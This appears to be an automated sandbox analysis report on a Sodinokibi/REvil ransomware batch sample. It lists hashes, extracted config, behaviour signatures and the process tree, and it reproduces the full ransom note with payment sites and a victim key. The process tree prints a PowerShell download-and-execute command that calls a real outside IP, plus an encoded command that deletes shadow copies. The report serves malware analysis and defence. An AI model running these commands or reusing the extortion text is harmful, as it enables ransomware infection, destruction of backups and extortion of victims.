Analysis

  • max time kernel
    134s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    19-05-2020 14:10

General

  • Target

    16c5855700e70589f21792245af61fb6.bat

  • Size

    221B

  • MD5

    bf1ad4f345b9b33c5574e4e4458d008a

  • SHA1

    b9bca5ce8683a86288b5431fde6d057f34cfe281

  • SHA256

    ca5e262f907de83f54f02c1a29643f7584d7934d6aeaf1244dd919d43aac6d05

  • SHA512

    4cfd0d06e0a11ff538e91457726895667ed88c73c9b533717bffc82d00e839d690c01917180b01f1c7d6c9640c938ba4991d9c06a7184d0d737f0506d57b3585

Malware Config

Extracted

Language

ps1

Source

ps1.dropper

URLs

http://185.103.242.78/pastes/16c5855700e70589f21792245af61fb6

Extracted

Path

C:\39scc5c-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 39scc5c.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:

1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/578F0CBD51C9BC23

2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.cc/578F0CBD51C9BC23

3) If you still have problems accessing the site, you can write to us at: [email protected], indicating the external IP address, country, key
xG/BQaXnlcbHqng4833dpCfYG5weDyyN4gDTKZYhE51CqdVwIpu0RyEf/dMcj1nh
eI+fhp+LrZpLf1IrztVNBF0gylfe+gsVROjRT0+5zFFvy1fyr1OEas+LTmXZzoE0
tc4RFVf3XA+hAu0Z48bshrho3jR3dthoADkAuI4WibE2jt7XZ9EIW8n5tZIZ7PTj
bFoSIYYj4737cjjFd1Db7dvspj78hqsTIBybmKNNlCKYLU6xk+CYQqO+rwCEQf7X
FOYv9WZ8Q65vJFz17jwffnsteydMRAhezpH3qp64QF0DCoAvDOaya9XUQmIfucQK
6Cb/CueZ+NbbBFU6CR+WbeA6bMM6h7ZNmm6CFxBT5He+kDRLhsu5Prnkgt7l0yIj
a6DYqrV2zkM59sXKqspL5dUG3Br2r9EIfpLrnYP/excX4pdychWB1GdNmGeK88v7
ONc+J5gZYVIB/frUKwFoskwCjyzMNxadTmTYJp565a2tmjGFDnr/0y9rcMLy+uYf
1AjLmx36GGmv1unNL7DZ9eKjVLQk3jU3SAlqvOz5QSS2SpfdTvidgMN/+S0p03BK
Tgu7f04z+2qG7/l7xDBrwTCdvqEjqJapLzU6RaEKq3FCGoiKLhgWzVk74av6uQp8
hpUnOfp8mjpOcM72Koyx03ePfXQA+6B99JFA6yqUKXu63aaqveDhkEJIpwSmeXqg
4q+q9wRk7LzRjzZDoBbR6Igdcr6FgVNSVg1W6NnV7cL299NCWahK0BgBEXhq6+BV
8ezB8C1qUdRp0JMOy9oEBx4e9itv0NZrENZJZWDQzLHR+r4MZL4/ZdWC9bOHzj6d
uiR/UK61gsA2D2pgeKE6ak3NSZJucnbHvqP81EiILrB58dtio+2wJcjD6101l3p2
gFXStuQsBtRjrJp/Xq1gEIlzc0jjOagddRi3eaTgYPyThIdegGjAO3+8U2xckRQU
7WJUpHpBWiiWwATMxQKsPYUoT9QYifVs/1YkgpZ409N30PtGTZUPnE8hM00UEyF7
mwuDY99aYNs+cTmRQbCA2fm1Q/4tKVhj7Xn8f61H4In1UCUbJ/6fPlm83TtmOB1v
zBGORBwxr56S+WZfBexWBTy/mQGy9QzFiX5KMlCqOA+MxxqQIMkN9pw3toEfbOu0
FrfTazYBA3tqfhXJ6nzx91pUZfD+kh1E+OaEDMYCGMHjg1IqpIv/EEGlXuHfGxxP
XCX7DSoLHrWcpXcAbAnBNVIyX6aw4uKai8lX0I3f0HgjYHjTTBbTh75tsgqWKAGA
cSRGM+yXjz39HNQGxS7V5r+3znPKmy4lwN/fEm0L01ABKA==
and extension 39scc5c

Warning: secondary website can be blocked, thats why first variant much better and more available.

When you open our website, put the following data in the input form:
Key:
xG/BQaXnlcbHqng4833dpCfYG5weDyyN4gDTKZYhE51CqdVwIpu0RyEf/dMcj1nh
eI+fhp+LrZpLf1IrztVNBF0gylfe+gsVROjRT0+5zFFvy1fyr1OEas+LTmXZzoE0
tc4RFVf3XA+hAu0Z48bshrho3jR3dthoADkAuI4WibE2jt7XZ9EIW8n5tZIZ7PTj
bFoSIYYj4737cjjFd1Db7dvspj78hqsTIBybmKNNlCKYLU6xk+CYQqO+rwCEQf7X
FOYv9WZ8Q65vJFz17jwffnsteydMRAhezpH3qp64QF0DCoAvDOaya9XUQmIfucQK
6Cb/CueZ+NbbBFU6CR+WbeA6bMM6h7ZNmm6CFxBT5He+kDRLhsu5Prnkgt7l0yIj
a6DYqrV2zkM59sXKqspL5dUG3Br2r9EIfpLrnYP/excX4pdychWB1GdNmGeK88v7
ONc+J5gZYVIB/frUKwFoskwCjyzMNxadTmTYJp565a2tmjGFDnr/0y9rcMLy+uYf
1AjLmx36GGmv1unNL7DZ9eKjVLQk3jU3SAlqvOz5QSS2SpfdTvidgMN/+S0p03BK
Tgu7f04z+2qG7/l7xDBrwTCdvqEjqJapLzU6RaEKq3FCGoiKLhgWzVk74av6uQp8
hpUnOfp8mjpOcM72Koyx03ePfXQA+6B99JFA6yqUKXu63aaqveDhkEJIpwSmeXqg
4q+q9wRk7LzRjzZDoBbR6Igdcr6FgVNSVg1W6NnV7cL299NCWahK0BgBEXhq6+BV
8ezB8C1qUdRp0JMOy9oEBx4e9itv0NZrENZJZWDQzLHR+r4MZL4/ZdWC9bOHzj6d
uiR/UK61gsA2D2pgeKE6ak3NSZJucnbHvqP81EiILrB58dtio+2wJcjD6101l3p2
gFXStuQsBtRjrJp/Xq1gEIlzc0jjOagddRi3eaTgYPyThIdegGjAO3+8U2xckRQU
7WJUpHpBWiiWwATMxQKsPYUoT9QYifVs/1YkgpZ409N30PtGTZUPnE8hM00UEyF7
mwuDY99aYNs+cTmRQbCA2fm1Q/4tKVhj7Xn8f61H4In1UCUbJ/6fPlm83TtmOB1v
zBGORBwxr56S+WZfBexWBTy/mQGy9QzFiX5KMlCqOA+MxxqQIMkN9pw3toEfbOu0
FrfTazYBA3tqfhXJ6nzx91pUZfD+kh1E+OaEDMYCGMHjg1IqpIv/EEGlXuHfGxxP
XCX7DSoLHrWcpXcAbAnBNVIyX6aw4uKai8lX0I3f0HgjYHjTTBbTh75tsgqWKAGA
cSRGM+yXjz39HNQGxS7V5r+3znPKmy4lwN/fEm0L01ABKA==

-----------------------------------------------------------------------------------------

!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!

!!! !!! ATTENTION !!! !!!
We want to warn you that in case of refusal to pay, we will post your confidential files that we have downloaded for general access or will sell part of them in the shadow market.
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/578F0CBD51C9BC23

http://decryptor.cc/578F0CBD51C9BC23

Signatures

  • Drops file in System32 directory 1 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Enumerates connected drives 3 TTPs
  • Drops file in Program Files directory 23 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Blacklisted process makes network request 86 IoCs
  • Modifies service 2 TTPs 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\16c5855700e70589f21792245af61fb6.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1432
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/16c5855700e70589f21792245af61fb6');Invoke-IGISEXRYSOUZFK;Start-Sleep -s 10000"
      2⤵
      • Drops file in System32 directory
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      PID:644
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1772
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1572

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms